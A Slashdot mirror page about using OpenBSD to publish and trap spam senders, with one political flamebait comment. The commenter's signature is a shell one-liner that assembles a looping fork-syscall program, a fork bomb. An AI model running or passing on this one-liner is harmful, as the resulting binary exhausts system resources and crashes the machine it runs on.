Slashdot Mirror


Name and Shame Spam Senders With OpenBSD

Peter N. M. Hansteen writes "Once you've identified spam senders, OpenBSD provides all the tools you need to take one step further: exporting their addresses and publishing the evidence. You can even trap them yourself using known bad addresses. It's easy, fun and good netizenship."

1 of 166 comments (clear)

  1. Re:Disturbance of domestic peace by Hal_Porter · · Score: 0, Flamebait

    Funny you should say that but 'disturbance of the peace' is one of the things that people that demonstrate in China get charged with.

    --
    echo -e 'global _start\n _start:\n mov eax, 2\n int 80h\n jmp _start' > a.asm; nasm a.asm -f elf; ld a.o -o a;